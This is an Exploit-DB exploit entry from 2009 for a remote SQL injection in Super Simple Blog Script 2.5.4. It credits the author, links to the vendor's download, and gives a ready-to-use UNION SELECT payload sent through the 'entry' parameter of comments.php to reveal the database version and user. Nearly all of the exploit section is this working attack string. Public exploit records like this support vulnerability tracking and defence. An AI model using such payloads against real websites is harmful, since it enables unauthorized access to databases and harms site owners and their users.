Super Simple Blog Script 2.5.4 - 'entry' SQL Injection

EDB-ID:

9180

Author:

JIKO

Type:

webapps

Platform:

PHP

Published:

2009-07-17

----------[exploit Debut]
[Remote SQL Injection Vulnerability]
----------[Script Info]

Moi	: JIKO
Site	: No-exploit.Com
Email	: mm  :(  Moghla9 Ferme Closed

----------[Script Info]

Site:http	: http://www.supersimple.org/
Download	: http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip

----------[exploit Info]

1]~[Sql]
http://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--
----------[exploit Fin]

# milw0rm.com [2009-07-17]